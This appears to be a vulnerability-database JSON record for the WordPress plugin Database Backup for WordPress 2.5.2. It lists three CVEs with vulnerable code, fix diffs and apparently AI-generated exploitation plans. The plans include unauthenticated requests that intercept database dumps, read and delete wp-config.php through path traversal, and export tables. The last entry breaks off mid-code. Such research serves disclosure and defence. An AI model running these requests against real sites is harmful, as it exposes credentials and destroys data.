[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNYhrPFdsXiPKbSsnLF7m8ExhgrVJILEDhe9iY-pIoIg":3,"$fOkbqEChzullV38iCVe4Zyh3YSCdfj9lkWw7D1V43NWs":569,"$fF_U-rfw9ju-xA_G47WMLHcFcrIt6GxXNmLRyzgx5sHc":573},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":24,"download_link":25,"security_score":26,"vuln_count":27,"unpatched_count":28,"last_vuln_date":29,"fetched_at":30,"discovery_status":31,"vulnerabilities":32,"developer":150,"crawl_stats":38,"alternatives":158,"analysis":262,"fingerprints":549},"wp-db-backup","Database Backup for WordPress","2.5.2","WP Engine","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpengine\u002F","\u003Cp>Backup your database instantly, send the backup via email, or schedule backups to run automatically.\u003C\u002Fp>\n\u003Cp>Database Backup for WordPress allows you to quickly back up your core WordPress database tables, and either download the backup as a gzipped file, or send it via email to an address you choose.\u003C\u002Fp>\n\u003Cp>By default, the plugin will always back up all the core WordPress database tables. However, you may also selectively back up any custom tables that might be created by other plugins\u003C\u002Fp>\n\u003Cp>Additional options include the ability to exclude spam comments from the comments table, or post revisions from the posts table, saving you space and bandwidth.\u003C\u002Fp>\n\u003Cp>You can also enable scheduled backups to run automatically at set intervals, and configure the email address to send the scheduled backups to.\u003C\u002Fp>\n\u003Ch4>Backup Before You Mess Up\u003C\u002Fh4>\n\u003Cp>Backups are the one thing you don’t think of until you need them. You might have the best web host, the most secure server, and a tried and tested process for running plugin, theme, or core updates. But all it takes is one little thing to go wrong, and you lose your entire website.\u003C\u002Fp>\n\u003Cp>You need a reliable and automated solution which backs up your WordPress data and sends it to an off-site location. Database Backup for WordPress is that solution.\u003C\u002Fp>\n\u003Ch4>Why You Should Back Up Your Website\u003C\u002Fh4>\n\u003Cp>As much planning as you do, any CMS like WordPress that stores its data in a database is vulnerable. Hardware, software, and security hiccups are rare, but they do happen. Even the best enterprise systems in the world have multiple levels of backup in place.\u003C\u002Fp>\n\u003Cp>Think about the data you store in your WordPress site. Your blog posts since the day you launched the site. Your customers, products, and order history if you run an ecommerce site. Backups are like implementing an insurance policy for your data. With backups, you have a reliable way of restoring that data if anything goes wrong.\u003C\u002Fp>\n\u003Cp>Simple, automated backups save you time and give you peace of mind that you are prepared for the worst case scenario, even if you never need it. Better to have it and not need it, than to not have it and suddenly need it.\u003C\u002Fp>\n\u003Ch4>Scheduled Backups\u003C\u002Fh4>\n\u003Cp>Depending on your needs, you might want to back up your database every few minutes, hourly, daily, weekly, or monthly. You’ll want to automate this process, or it becomes another possible point of failure.\u003C\u002Fp>\n\u003Cp>Scheduled backups give you peace of mind that your data is being backed up as much or as little as you need, without your intervention. By emailing the backups to an email address you choose, you can verify that the backup has run, and store it in a safe location.\u003C\u002Fp>\n\u003Ch3>Translators\u003C\u002Fh3>\n\u003Cp>Thanks to the following people for providing translation files for Database Backup for WordPress:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Abel Cheung\u003C\u002Fli>\n\u003Cli>Alejandro Urrutia\u003C\u002Fli>\n\u003Cli>Alexander Kanakaris\u003C\u002Fli>\n\u003Cli>Angelo Andrea Iorio\u003C\u002Fli>\n\u003Cli>Calle\u003C\u002Fli>\n\u003Cli>Daniel Erb\u003C\u002Fli>\n\u003Cli>Daniel Villoldo\u003C\u002Fli>\n\u003Cli>Diego Pierotto\u003C\u002Fli>\n\u003Cli>Eilif Nordseth\u003C\u002Fli>\n\u003Cli>Eric Lassauge\u003C\u002Fli>\n\u003Cli>Friedlich\u003C\u002Fli>\n\u003Cli>Gilles Wittezaele\u003C\u002Fli>\n\u003Cli>Icemanpro\u003C\u002Fli>\n\u003Cli>İzzet Emre Erkan\u003C\u002Fli>\n\u003Cli>Jong-In Kim\u003C\u002Fli>\n\u003Cli>Kaveh\u003C\u002Fli>\n\u003Cli>Kessia Pinheiro\u003C\u002Fli>\n\u003Cli>Kuratkoo\u003C\u002Fli>\n\u003Cli>Majed Alotaibi\u003C\u002Fli>\n\u003Cli>Michał Gołuński\u003C\u002Fli>\n\u003Cli>Michele Spagnuolo\u003C\u002Fli>\n\u003Cli>Paopao\u003C\u002Fli>\n\u003Cli>Philippe Galliard\u003C\u002Fli>\n\u003Cli>Robert Buj\u003C\u002Fli>\n\u003Cli>Roger\u003C\u002Fli>\n\u003Cli>Rune Gulbrandsøy\u003C\u002Fli>\n\u003Cli>Serge Rauber\u003C\u002Fli>\n\u003Cli>Sergey Biryukov\u003C\u002Fli>\n\u003Cli>Tai\u003C\u002Fli>\n\u003Cli>Timm Severin\u003C\u002Fli>\n\u003Cli>Tzafrir Rehan\u003C\u002Fli>\n\u003Cli>吴曦\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Past Contributors\u003C\u002Fh3>\n\u003Cp>filosofo, skippy, Firas, LaughingLizard, MtDewVirus, Podz, Ringmaster\u003C\u002Fp>\n","Database Backup for WordPress is your one-stop database backup solution for WordPress.",70000,3732581,90,66,"2022-05-26T11:49:00.000Z","6.0.11","3.6.0","5.3",[20,21,22,23],"backup","database","database-backup","mysql","https:\u002F\u002Fgithub.com\u002Fdeliciousbrains\u002Fwp-db-backup","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.5.2.zip",77,7,0,"2026-05-13 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[33,64,81,92,107,122,138],{"id":34,"url_slug":35,"title":36,"description":37,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":40,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":29,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":38,"research_status":53,"research_verified":54,"research_rounds_completed":55,"research_plan":56,"research_summary":57,"research_vulnerable_code":58,"research_fix_diff":59,"research_exploit_outline":60,"research_model_used":61,"research_started_at":62,"research_completed_at":63,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-4031","database-backup-for-wordpress-missing-authorization-to-unauthenticated-database-backup-interception","Database Backup for WordPress \u003C= 2.5.2 - Missing Authorization to Unauthenticated Database Backup Interception","The Database Backup for WordPress plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.5.2. This is due to the plugin not restricting access to the wp_db_temp_dir parameter, which controls where database backups are written. This makes it possible for unauthenticated attackers to send a request to wp-cron.php with a poisoned wp_db_temp_dir value pointing to a publicly accessible directory (e.g., wp-content\u002Fuploads\u002F), and if a scheduled backup is due, intercept the backup file before it is cleaned up. The backup file has a predictable name based on the database name, table prefix, date, and Swatch Internet Time, making interception reliable. Successful exploitation leads to Sensitive Information Exposure including database credentials, user password hashes, and personally identifiable information. This vulnerability requires that the site administrator has configured scheduled backups.",null,"\u003C=2.5.2","2.5.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Missing Authorization","2026-05-14 12:32:10",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F36615cae-418f-48b0-ba69-b54515cbe1d7?source=api-prod",2,[50,51,52],"README.md","readme.txt","wp-db-backup.php","researched",false,3,"This research plan outlines the steps to verify and exploit **CVE-2026-4031**, a missing authorization vulnerability in the **Database Backup for WordPress** plugin.\n\n### 1. Vulnerability Summary\nThe `wp-db-backup` plugin (up to version 2.5.2) allows unauthenticated users to influence the directory where scheduled database backups are temporarily stored. This occurs because the plugin's constructor in `wp-db-backup.php` reads the `wp_db_temp_dir` parameter from the global `$_GET` array without performing any capability or authentication checks. If an attacker provides a path to a publicly accessible directory (like `wp-content\u002Fuploads\u002F`), a scheduled backup triggered via `wp-cron.php` will be written to that location. Because the backup filename is predictable, the attacker can then download the entire database dump.\n\n### 2. Attack Vector Analysis\n*   **Target Endpoint**: `[WP_URL]\u002Fwp-cron.php`\n*   **Vulnerable Parameter**: `wp_db_temp_dir` (passed via GET)\n*   **Authentication**: None (Unauthenticated)\n*   **Preconditions**: \n    1.  The site administrator must have configured a \"Scheduled Backup\" (found in **Tools > Backup**).\n    2.  The attacker must know or guess the absolute path to a writable, public directory (e.g., `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F`).\n    3.  A scheduled backup must be due for execution when the attacker triggers `wp-cron.php`.\n\n### 3. Code Flow\n1.  **Entry Point**: A request is made to any WordPress page (specifically `wp-cron.php`) with `?wp_db_temp_dir=\u002Fpath\u002Fto\u002Fpublic\u002Fdir`.\n2.  **Initialization**: The `wpdbBackup` class is instantiated. In the constructor (`wp-db-backup.php` line 135):\n    ```php\n    $tmp_dir = get_temp_dir();\n\n    if ( isset( $_GET['wp_db_temp_dir'] ) ) {\n        $requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n        if ( is_writeable( $requested_dir ) ) { \u002F\u002F No auth check here!\n            $tmp_dir = $requested_dir;\n        }\n    }\n    $this->backup_dir = trailingslashit( apply_filters( 'wp_db_b_backup_dir', $tmp_dir ) );\n    ```\n3.  **Cron Trigger**: `wp-cron.php` checks for pending tasks. If `wp_db_backup_cron` is due, it fires.\n4.  **Backup Execution**: The `cron_backup()` method (hooked at line 115) runs. It uses `$this->backup_dir` to store the generated SQL file.\n5.  **Filename Generation**: The filename is generated in the constructor (lines 124-125):\n    ```php\n    $datum                 = date( 'Ymd_B' );\n    $this->backup_filename = DB_NAME . \"_$table_prefix$datum.sql\";\n    ```\n    *   `DB_NAME`: Database name (e.g., `wordpress`).\n    *   `$table_prefix`: WordPress table prefix (e.g., `wp_`).\n    *   `date('Ymd_B')`: `Ymd` is the date, `B` is the Swatch Internet Time (000-999).\n\n### 4. Nonce Acquisition Strategy\nThis specific vulnerability **does not require a nonce**. \nThe poisoned parameter is processed in the class constructor (`__construct`), which runs on every request including unauthenticated cron triggers. While the \"Scheduled Backup\" *form* was patched with a nonce in 2.5.2 to prevent CSRF, the *consumption* of the `wp_db_temp_dir` parameter in the constructor remains unauthenticated in affected versions.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Reconnaissance\nIdentify the database name and table prefix. \n*   Standard defaults are `DB_NAME=wordpress` and `$table_prefix=wp_`.\n*   Determine the current Swatch Internet Time (`date('B')`).\n\n#### Step 2: Poison the Backup Path & Trigger Cron\nSend a request to `wp-cron.php` supplying the poisoned directory and triggering the cron runner.\n*   **Request**: `GET \u002Fwp-cron.php?doing_wp_cron&wp_db_temp_dir=\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F`\n*   **Note**: The absolute path is required. In standard Docker environments, this is usually `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F`.\n\n#### Step 3: Predict the Filename\nThe file will be named: `[DB_NAME]_[PREFIX][YYYYMMDD]_[SWATCH_TIME].sql`.\nExample: `wordpress_wp_20231027_123.sql`.\n*   Since Swatch time represents \"beats\" (1000 per day), you may need to check the current beat and the next 2-3 beats to account for execution time.\n\n#### Step 4: Intercept the Backup\nImmediately attempt to download the file from the public uploads directory.\n*   **Request**: `GET \u002Fwp-content\u002Fuploads\u002Fwordpress_wp_20231027_123.sql`\n\n### 6. Test Data Setup\n1.  **Plugin Installation**: Install and activate `wp-db-backup` version 2.5.2.\n2.  **Configuration**: \n    *   Navigate to **Tools > Backup**.\n    *   Under \"Scheduled Backup\", select \"Once Daily\" and enter an email address.\n    *   Click \"Save Settings\".\n3.  **Cron Sync**: Ensure a backup task is actually scheduled:\n    ```bash\n    wp cron event list --name=wp_db_backup_cron\n    ```\n4.  **Force Due**: To make the exploit reliable for testing, set the next run time to the past:\n    ```bash\n    wp cron event run wp_db_backup_cron --due-now\n    ```\n\n### 7. Expected Results\n*   The request to `wp-cron.php` should return a `200 OK` (empty response).\n*   A file should appear in `wp-content\u002Fuploads\u002F` containing the full MySQL database export.\n*   The content of the SQL file will include the `wp_users` table with admin password hashes and the `wp_options` table.\n\n### 8. Verification Steps\n1.  **Verify File Creation**: Use `ls` inside the environment to check if the file exists in the uploads directory:\n    ```bash\n    ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F*.sql\n    ```\n2.  **Verify Content**: Check the head of the SQL file for database structure:\n    ```bash\n    head \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F[FILENAME].sql\n    ```\n\n### 9. Alternative Approaches\n*   **Swatch Brute-force**: If the exact time of the cron execution is slightly off, iterate through 10 beats (approx. 14 minutes) of Swatch time filenames.\n*   **Directory Listing**: If the server has directory listing enabled on `wp-content\u002Fuploads\u002F`, simply navigate to that URL to see the generated file.\n*   **Path Discovery**: If `\u002Fvar\u002Fwww\u002Fhtml\u002F` is incorrect, common WordPress paths include `\u002Fhome\u002Fuser\u002Fpublic_html\u002Fwp-content\u002Fuploads\u002F` or using the `is_writeable` check to confirm paths via error-based side channels if `WP_DEBUG` is on.","The Database Backup for WordPress plugin allows unauthenticated users to specify the directory where scheduled database backups are temporarily stored via the 'wp_db_temp_dir' parameter. By pointing this to a publicly accessible directory, an attacker can intercept and download the resulting database dump, which uses a predictable filename based on the database name, prefix, and current time.","\u002F\u002F wp-db-backup.php lines 120-121\n$datum                 = date( 'Ymd_B' );\n$this->backup_filename = DB_NAME . \"_$table_prefix$datum.sql\";\n\n---\n\n\u002F\u002F wp-db-backup.php lines 146-153\n$tmp_dir = get_temp_dir();\n\nif ( isset( $_GET['wp_db_temp_dir'] ) ) {\n\t$requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n\tif ( is_writeable( $requested_dir ) ) {\n\t\t$tmp_dir = $requested_dir;\n\t}\n}","--- wp-db-backup.php\n+++ wp-db-backup.php\n@@ -146,9 +146,2 @@\n \t\t$tmp_dir = get_temp_dir();\n \n-\t\tif ( isset( $_GET['wp_db_temp_dir'] ) ) {\n-\t\t\t$requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n-\t\t\tif ( is_writeable( $requested_dir ) ) {\n-\t\t\t\t$tmp_dir = $requested_dir;\n-\t\t\t}\n-\t\t}\n-","1. Identify a writeable, publicly accessible directory on the target server (e.g., \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F).\n2. Determine the target's database name and table prefix (defaults: 'wordpress', 'wp_').\n3. Send an unauthenticated GET request to wp-cron.php with the poisoned parameter: ?doing_wp_cron&wp_db_temp_dir=[absolute_path_to_public_dir].\n4. Trigger the WordPress cron system. If a scheduled backup task is due, the plugin will save the SQL dump to the specified public directory.\n5. Predict the backup filename (DBNAME_PREFIX_YYYYMMDD_SWATCHTIME.sql) and download the file from the public directory.","gemini-3-flash-preview","2026-05-14 17:38:15","2026-05-14 17:39:10",{"id":65,"url_slug":66,"title":67,"description":68,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":40,"severity":41,"cvss_score":69,"cvss_vector":70,"vuln_type":44,"published_date":29,"updated_date":45,"references":71,"days_to_patch":48,"patch_diff_files":73,"patch_trac_url":38,"research_status":53,"research_verified":54,"research_rounds_completed":55,"research_plan":74,"research_summary":75,"research_vulnerable_code":76,"research_fix_diff":77,"research_exploit_outline":78,"research_model_used":61,"research_started_at":79,"research_completed_at":80,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-4030","database-backup-for-wordpress-missing-authorization-to-unauthenticated-arbitrary-file-read-and-deletion","Database Backup for WordPress \u003C= 2.5.2 - Missing Authorization to Unauthenticated Arbitrary File Read and Deletion","The Database Backup for WordPress plugin for WordPress is vulnerable to unauthorized arbitrary file read and deletion in all versions up to, and including, 2.5.2. This is due to the plugin not properly enforcing the return value of its authorization check combined with a user-controlled backup directory parameter. This makes it possible for unauthenticated attackers to read and delete arbitrary files on the server, leading to Sensitive Information Exposure and potential site takeover. Note: This vulnerability is only exploitable in WordPress Multisite environments where the deprecated is_site_admin() function exists.",8.1,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H",[72],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3e21b550-e1c5-4e23-9999-16c837353da9?source=api-prod",[50,51,52],"# Exploitation Research Plan - CVE-2026-4030\n\n## 1. Vulnerability Summary\nThe **Database Backup for WordPress** plugin (\u003C= 2.5.2) contains a critical missing authorization vulnerability combined with a path traversal\u002Farbitrary file access flaw. The plugin provides a mechanism to download or email backup files via the `init()` function. However, the authorization check function `can_user_backup()` is called but its return value is not enforced (it doesn't `die()` on failure). \n\nIn WordPress Multisite environments where the deprecated `is_site_admin()` function exists, this check fails to stop execution for unauthenticated users. Furthermore, the plugin allows the backup directory to be overridden via the `wp_db_temp_dir` GET parameter. This combination allows an unauthenticated attacker to read and subsequently delete arbitrary files on the server that the web server has permissions to access and write to.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The site root `index.php` (triggering the `init` hook).\n*   **Vulnerable Action:** The `init()` method of the `wpdbBackup` class, which is hooked to WordPress `init`.\n*   **Parameters:**\n    *   `backup`: (GET) The name of the file to read\u002Fdelete.\n    *   `wp_db_temp_dir`: (GET) The directory path where the file is located.\n    *   `via`: (GET) Delivery method (defaults to `http` for direct download).\n*   **Preconditions:**\n    *   WordPress Multisite environment.\n    *   Presence of the `is_site_admin()` function.\n    *   The targeted directory (`wp_db_temp_dir`) must be writable by the PHP process (as per the `is_writeable()` check in `__construct`).\n\n## 3. Code Flow\n1.  **Initialization:** In `wpdbBackup::__construct()`, the plugin checks for the `backup` GET parameter:\n    ```php\n    } elseif ( isset( $_GET['backup'] ) ) {\n        $this->can_user_backup(); \u002F\u002F Authorization check called but result ignored\n        add_action( 'init', array( &$this, 'init' ) );\n    }\n    ```\n2.  **Directory Override:** Also in `__construct()`, the backup directory can be set by the user:\n    ```php\n    if ( isset( $_GET['wp_db_temp_dir'] ) ) {\n        $requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n        if ( is_writeable( $requested_dir ) ) {\n            $tmp_dir = $requested_dir;\n        }\n    }\n    $this->backup_dir = trailingslashit( apply_filters( 'wp_db_b_backup_dir', $tmp_dir ) );\n    ```\n3.  **Vulnerable Execution:** The `init()` method is triggered:\n    ```php\n    function init() {\n        $this->can_user_backup(); \u002F\u002F Result ignored again\n        if ( isset( $_GET['backup'] ) ) {\n            $via = isset( $_GET['via'] ) ? sanitize_text_field( $_GET['via'] ) : 'http';\n            $this->backup_file = sanitize_text_field( $_GET['backup'] );\n            $this->validate_file( $this->backup_file ); \u002F\u002F Likely checks existence in backup_dir\n            \n            switch ( $via ) {\n                \u002F\u002F ... (email cases)\n                default:\n                    $success = $this->deliver_backup( $this->backup_file, $via );\n            }\n            exit;\n        }\n    }\n    ```\n4.  **File Read & Delete:** `deliver_backup()` (inferred) sends the file to the browser and then `unlinks` it from `$this->backup_dir . $this->backup_file`.\n\n## 4. Nonce Acquisition Strategy\nThis specific vulnerability exploit path (via `GET['backup']`) **does not require a nonce**. \n*   The `__construct` logic only requires `check_admin_referer` (nonce check) if `$_POST['do_backup']` is set.\n*   The `$_GET['backup']` path only calls `can_user_backup()`, which is the faulty authorization check.\n*   Therefore, no nonce acquisition is necessary for unauthenticated exploitation.\n\n## 5. Exploitation Strategy\n\n### Goal: Read and Delete `wp-config.php`\n*Note: This is highly destructive as it will delete the configuration file.*\n\n### Step 1: Identify a Writable Directory\nThe `wp_db_temp_dir` must be writable. Common candidates in WordPress are:\n*   `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads` (usually writable)\n*   `\u002Ftmp`\n\n### Step 2: Path Traversal Attack\nSince we need to target `wp-config.php` (usually in the web root), and `wp_db_temp_dir` must be writable, we can point `wp_db_temp_dir` to the `uploads` directory and use path traversal in the `backup` parameter to reach `wp-config.php`.\n\n**Request Details:**\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F`\n*   **Query Parameters:**\n    *   `backup=..\u002F..\u002Fwp-config.php`\n    *   `wp_db_temp_dir=\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F`\n\n**Execution with `http_request`:**\n```javascript\nawait http_request({\n  method: \"GET\",\n  url: \"http:\u002F\u002Flocalhost:8080\u002F\",\n  params: {\n    backup: \"..\u002F..\u002Fwp-config.php\",\n    wp_db_temp_dir: \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F\"\n  }\n});\n```\n\n## 6. Test Data Setup\n1.  **Multisite Setup:** Ensure WordPress is configured for Multisite.\n2.  **Permissions:** Ensure `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F` is writable by the `www-data` user.\n3.  **Mock Function (if testing on modern WP):** If testing on a version of WP where `is_site_admin()` is completely gone, it may need to be defined in a mu-plugin to simulate the vulnerable environment:\n    ```php\n    \u002F\u002F \u002Fwp-content\u002Fmu-plugins\u002Fmock-admin.php\n    function is_site_admin() { return false; }\n    ```\n\n## 7. Expected Results\n*   **HTTP Response:** The content of `wp-config.php` should be returned in the response body.\n*   **Content-Disposition:** Headers likely include `attachment; filename=\"wp-config.php\"`.\n*   **Filesystem Change:** The file `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` will be **deleted** immediately after the request completes.\n\n## 8. Verification Steps\n1.  **Check Response Body:** Verify the response contains the string `DB_NAME` or `DB_PASSWORD`.\n2.  **Check Filesystem via WP-CLI:**\n    ```bash\n    # This should fail if the file was successfully deleted\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php\n    ```\n3.  **Verify Site Failure:** Attempting to load the WordPress site after exploitation should result in the WordPress \"Welcome\" installation screen, as `wp-config.php` is missing.\n\n## 9. Alternative Approaches\nIf direct path traversal in the `backup` parameter is blocked by `sanitize_text_field`, try pointing `wp_db_temp_dir` directly to the directory containing sensitive files that are likely writable, such as:\n1.  Targeting a specific log file in `wp-content\u002F`:\n    `?backup=debug.log&wp_db_temp_dir=\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F`\n2.  Targeting a backup file created by the plugin itself in its default directory:\n    `?backup=database_name_wp_2023.sql&wp_db_temp_dir=\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fbackup-xyz\u002F` (if the directory is known or predictable).","The Database Backup for WordPress plugin allows unauthenticated users to read and delete arbitrary files on a server due to a failure in enforcing authorization checks and a user-controllable backup directory parameter. Attackers can exploit this via path traversal to download sensitive files like wp-config.php, which are then automatically deleted from the server by the plugin after the download completes.","\u002F\u002F wp-db-backup.php @ lines 138-144\n\t\tif ( isset( $_GET['wp_db_temp_dir'] ) ) {\n\t\t\t$requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n\t\t\tif ( is_writeable( $requested_dir ) ) {\n\t\t\t\t$tmp_dir = $requested_dir;\n\t\t\t}\n\t\t}\n\n---\n\n\u002F\u002F wp-db-backup.php @ lines 162-165\n\t\t} elseif ( isset( $_GET['backup'] ) ) {\n\t\t\t$this->can_user_backup();\n\t\t\tadd_action( 'init', array( &$this, 'init' ) );\n\t\t} else {\n\n---\n\n\u002F\u002F wp-db-backup.php @ lines 168-170\n\tfunction init() {\n\t\t$this->can_user_backup();\n\t\tif ( isset( $_GET['backup'] ) ) {","--- wp-db-backup.php\n+++ wp-db-backup.php\n@@ -138,12 +138,6 @@\n \n \t\t$tmp_dir = get_temp_dir();\n \n-\t\tif ( isset( $_GET['wp_db_temp_dir'] ) ) {\n-\t\t\t$requested_dir = sanitize_text_field( $_GET['wp_db_temp_dir'] );\n-\t\t\tif ( is_writeable( $requested_dir ) ) {\n-\t\t\t\t$tmp_dir = $requested_dir;\n-\t\t\t}\n-\t\t}\n \n \t\t$this->backup_dir = trailingslashit( apply_filters( 'wp_db_b_backup_dir', $tmp_dir ) );\n \t\t$this->basename   = 'wp-db-backup';\n@@ -160,10 +154,12 @@\n \t\t\t}\n \t\t} elseif ( isset( $_GET['fragment'] ) ) {\n-\t\t\t$this->can_user_backup( 'frame' );\n-\t\t\tadd_action( 'init', array( &$this, 'init' ) );\n+\t\t\tif ( $this->can_user_backup( 'frame' ) ) {\n+\t\t\t\tadd_action( 'init', array( &$this, 'init' ) );\n+\t\t\t}\n \t\t} elseif ( isset( $_GET['backup'] ) ) {\n-\t\t\t$this->can_user_backup();\n-\t\t\tadd_action( 'init', array( &$this, 'init' ) );\n+\t\t\tif ( $this->can_user_backup() ) {\n+\t\t\t\tadd_action( 'init', array( &$this, 'init' ) );\n+\t\t\t}\n \t\t} else {\n \t\t\tadd_action( 'admin_menu', array( &$this, 'admin_menu' ) );\n \t\t}\n@@ -168,7 +164,9 @@\n \n \tfunction init() {\n-\t\t$this->can_user_backup();\n+\t\tif ( ! $this->can_user_backup() ) {\n+\t\t\treturn;\n+\t\t}\n \t\tif ( isset( $_GET['backup'] ) ) {\n \t\t\t$via = isset( $_GET['via'] ) ? sanitize_text_field( $_GET['via'] ) : 'http';","The exploit targets the WordPress `init` hook by sending a GET request to the site root with specific parameters. An attacker sets the `wp_db_temp_dir` parameter to a writable directory on the server (e.g., the WordPress uploads directory) and provides a path-traversal string in the `backup` parameter to target sensitive files (e.g., `..\u002F..\u002Fwp-config.php`). Because the plugin fails to terminate execution when the `can_user_backup()` authorization check fails, and ignores nonce requirements for the GET-based backup retrieval path, the attacker can download the targeted file. After delivery, the plugin's `deliver_backup` logic deletes the file using `unlink()`, potentially disabling the site or removing audit logs. This exploit is effective in Multisite environments where legacy authorization functions exist.","2026-05-14 17:35:01","2026-05-14 17:36:01",{"id":82,"url_slug":83,"title":84,"description":85,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":40,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":29,"updated_date":45,"references":86,"days_to_patch":48,"patch_diff_files":88,"patch_trac_url":38,"research_status":53,"research_verified":54,"research_rounds_completed":55,"research_plan":89,"research_summary":38,"research_vulnerable_code":38,"research_fix_diff":38,"research_exploit_outline":38,"research_model_used":61,"research_started_at":90,"research_completed_at":91,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":54,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-4029","database-backup-for-wordpress-missing-authorization-to-unauthenticated-database-export","Database Backup for WordPress \u003C= 2.5.2 - Missing Authorization to Unauthenticated Database Export","The Database Backup for WordPress plugin for WordPress is vulnerable to unauthorized database export in all versions up to, and including, 2.5.2. This is due to the plugin not properly enforcing the return value of its authorization check. This makes it possible for unauthenticated attackers to export database tables, leading to Sensitive Information Exposure. Note: This vulnerability is only exploitable in WordPress Multisite environments where the deprecated is_site_admin() function exists.",[87],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd4a21d0d-f455-4901-a04b-13c891cf8f75?source=api-prod",[50,51,52],"# Exploitation Research Plan - CVE-2026-4029\n\n## 1. Vulnerability Summary\nThe **Database Backup for WordPress** plugin (\u003C= 2.5.2) contains a missing authorization vulnerability that allows unauthenticated attackers to trigger and download a full database export. The flaw exists because the plugin's authorization method, `can_user_backup()`, fails to terminate execution (e.g., via `wp_die()`) when an authorization check fails, particularly in WordPress Multisite environments where the legacy `is_site_admin()` function is present. \n\nBecause the caller of this function (the `init()` method) does not check the return value of `can_user_backup()`, the code proceeds to execute the backup and delivery logic regardless of the user's authentication or authorization status.\n\n## 2. Attack Vector Analysis\n*   **Endpoints:** Any WordPress page (frontend or backend), as the vulnerable logic is hooked to `init`.\n*   **Vulnerable Parameters:** `fragment` (for triggering the export) and `backup` (for downloading the file).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** \n    1.  The environment must be a **WordPress Multisite** installation.\n    2.  The deprecated function `is_site_admin()` must exist in the environment (common in legacy Multisite setups or installations with compatibility layers).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated request is made with the `fragment` GET parameter.\n2.  **Hook Registration:** Inside `wp-db-backup.php`, the `__construct()` method of the `wpdbBackup` class runs:\n    ```php\n    } elseif ( isset( $_GET['fragment'] ) ) {\n        $this->can_user_backup( 'frame' ); \u002F\u002F Logic fails to die() here\n        add_action( 'init', array( &$this, 'init' ) );\n    ```\n3.  **Authorization Failure:** `can_user_backup()` is called. In a Multisite environment with `is_site_admin()` defined, the plugin checks authorization but likely returns `false` instead of calling `wp_die()`.\n4.  **Bypass:** The execution returns to `__construct()`, which successfully registers the `init` action.\n5.  **Execution Sink:** When the `init` hook fires, `wpdbBackup::init()` is called:\n    ```php\n    function init() {\n        $this->can_user_backup(); \u002F\u002F Again, return value ignored\n        if ( isset( $_GET['fragment'] ) ) {\n            list($table, $segment, $filename) = explode( ':', sanitize_text_field( $_GET['fragment'] ) );\n            \u002F\u002F ... validation logic ...\n            $this->backup_fragment( $table, $segment, $filename 